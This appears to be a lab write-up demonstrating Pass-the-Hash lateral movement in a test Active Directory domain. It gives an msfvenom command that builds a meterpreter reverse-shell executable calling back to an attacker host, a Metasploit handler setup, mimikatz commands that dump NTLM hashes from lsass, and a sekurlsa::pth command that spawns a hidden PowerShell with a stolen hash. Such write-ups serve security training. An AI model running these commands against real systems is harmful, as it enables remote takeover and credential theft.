Network Diagram

Diagrama sin título.drawio.png

Laboratory Setup

The lab consists of an Active Directory environment configured with the following parameters.

Users

The following user accounts have been added to the domain structure:
6d72a660ff3a233a7c153ba8c619e58a.png

Explotation phase

Since Pass-the-Hash is a lateral movement technique, we require an established shell with administrative/system privileges on one of the network endpoints.
I will establish an interactive meterpreter session. To achieve this, I generate a malicious executable using msfvenom which will subsequently be executed by the user manuel.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.25.100.35 LPORT=4444 -f exe -o virus.exe

8eccc8e618cdb21365a4dd9beea2ab16.png
045f509721d3ec9cda5b68d27aee325d.png
We initialize the Metasploit multi-handler payload listener:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 172.25.100.35
run

1c00a3d309d13553bc812044e8406313.png

NOTE
Since we already hold valid credentials, executing a binary payload is not strictly necessary. We could pivot laterally using RDP or tools within the Impacket suite. However, because meterpreter includes the Mimikatz suite via the kiwi extension natively, I opted for this approach for convenience.

Note that this terminal session runs with Windows SYSTEM privileges, accurately replicating a scenario where an initial endpoint has been completely compromised, and the threat actor aims to pivot across the infrastructure.

Pass-the-Hash (PtH)

Once the interactive console is established, the first step is loading the kiwi module inside meterpreter to download mimikatz into the objetive.

load kiwi

Next, we extract the active NTLM hashes residing inside the memory space of the lsass.exe process:

kiwi_cmd sekurlsa::logonpasswords

fed23b7092fc2490ef9af8af40e6803c.png
Now, we spawn a privileged process on behalf of user manuel by directly passing the exfiltrated NTLM hash:

kiwi_cmd sekurlsa::pth /user:manuel /domain:aroche.local /ntlm:457c97b1bac482268788b5acac306d71 /run:"powershell -w hidden"

a8fe8f51dbf1605a408ef7827ce4bb95.png
By routing our session into this newly spawned process, we obtain an authenticated command shell.
122ffb6c63a39bc923c8c30849e5fe32.png
With this active session, we have effectively gained access to network services and privileges tied to that user across the domain structure. This hash could similarly be leveraged using administrative tools like the Sysinternals suite.